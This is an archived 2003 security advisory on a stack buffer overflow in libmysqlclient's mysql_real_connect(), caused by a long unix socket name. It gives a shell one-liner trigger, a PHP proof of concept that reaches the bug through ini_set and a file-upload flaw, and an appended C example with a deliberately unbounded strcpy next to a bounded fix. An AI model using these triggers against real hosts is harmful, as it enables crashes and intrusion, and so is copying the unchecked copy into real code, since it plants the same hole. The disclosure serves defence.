SCAN Associates Sdn Bhd Security Advisory

Products:     libmysqlclient 4.x and below (http://www.mysql.com)
Date:         12 June 2003
Author:       pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
              shaharil_at_scan-associates.net
              munir_at_scan-associates.net
URL:          http://www.scan-associates.net

Summary: libmysqlclient 4.x and below mysql_real_connect() buffer overflow.

Description
===========

libmysqlclient is the client library used to communicate with a MySQL server.

Details
=======

There is a stack buffer overflow in the mysql_real_connect() function when it
is passed a long unix socket name (over 300 characters). The socket name is
copied into a fixed-size buffer on the stack without a length check, so any
caller that lets a user choose the socket path can trigger it.

Example, from the command-line client:

    mysql -S `perl -e 'print "A" x 350'` -hlocalhost

Proof of concept
----------------

This bug has been successfully tested under PHP safe_mode, using the Geeklog
bug we published recently (http://www.scan-associates.net/papers/geeklog.txt),
which lets a user upload a *.php file. The overflow is reachable from PHP
because ini_set() can point mysql.default_socket at an attacker-chosen string,
which mysql_connect() then passes to mysql_real_connect() as the unix socket
name.

    <?php
    // Build a 350-byte socket name, well past the ~300 bytes that fit in the
    // client library's stack buffer.
    $buff = '';
    for ($i = 0; $i < 350; $i++) {
        $buff .= "A";
    }
    // Point the client library at the oversized path; mysql_connect() hands it
    // to mysql_real_connect() as the unix socket name.
    ini_set("mysql.default_socket", $buff);
    // The credentials do not matter: the overflow happens while the socket is
    // being set up, before they are ever used.
    mysql_connect("localhost", "blabla", "blabla");
    ?>

Vendor Response
===============

The vendor was contacted on 06/01/2003; a fix will be available soon.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
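The advisory describes the bug class but not the library's internal code. The following is an added example, not code from the advisory or from libmysqlclient: it shows the generic "unbounded copy of a socket path into a fixed-size buffer" pattern using the standard sockaddr_un structure (sun_path is 108 bytes on Linux, 104 on the BSDs; the real library's buffer size and variable names are not given in the advisory and are not assumed here), alongside the bounded version that rejects the 350-byte name the advisory uses. The function names and the payload are the example's own.

```c
/* Added example: the overflow pattern and its bounded fix, built on the
 * standard struct sockaddr_un.  Not libmysqlclient code. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Vulnerable pattern: an attacker-chosen socket path is copied into the
 * fixed-size sun_path with no length check.  A 350-byte path runs well past
 * the end of the struct into whatever the caller keeps on its stack.  Shown
 * only to make the missing check visible; never call it with untrusted input. */
int unsafe_build_unix_addr(struct sockaddr_un *addr, const char *path)
{
    memset(addr, 0, sizeof *addr);
    addr->sun_family = AF_UNIX;
    strcpy(addr->sun_path, path);   /* unbounded copy: the bug class */
    return 0;
}

/* Hardened form: refuse anything that does not fit together with its NUL.
 * Returns 0 on success, -1 with errno = ENAMETOOLONG when the path is too long. */
int build_unix_addr(struct sockaddr_un *addr, const char *path)
{
    size_t len = strlen(path);
    if (len >= sizeof addr->sun_path) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memset(addr, 0, sizeof *addr);
    addr->sun_family = AF_UNIX;
    memcpy(addr->sun_path, path, len + 1);
    return 0;
}

/* Number of bytes an unbounded strcpy of `path` (including its NUL) would
 * write past the end of sun_path; 0 when the path fits. */
size_t socket_path_overflow(const char *path)
{
    size_t cap = sizeof(((struct sockaddr_un *)0)->sun_path);
    size_t needed = strlen(path) + 1;
    return needed > cap ? needed - cap : 0;
}

int main(void)
{
    struct sockaddr_un addr;
    char payload[351];              /* constructed: the advisory's "A" x 350 */
    memset(payload, 'A', 350);
    payload[350] = '\0';

    printf("sun_path holds %zu bytes\n", sizeof addr.sun_path);
    printf("a 350-byte socket name overflows it by %zu bytes\n",
           socket_path_overflow(payload));
    if (build_unix_addr(&addr, payload) == -1)
        printf("rejected: %s\n", strerror(errno));
    if (build_unix_addr(&addr, "/tmp/mysql.sock") == 0)
        printf("accepted: %s\n", addr.sun_path);
    return 0;
}
```

The check belongs wherever the path enters the library, not in the callers: the advisory's PHP vector works precisely because mysql_connect() trusts an ini value and forwards it, so a bound enforced inside mysql_real_connect() protects every caller at once.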
This archive was generated by hypermail 2b30 : Thu Jun 12 2003 - 08:19:39 PDT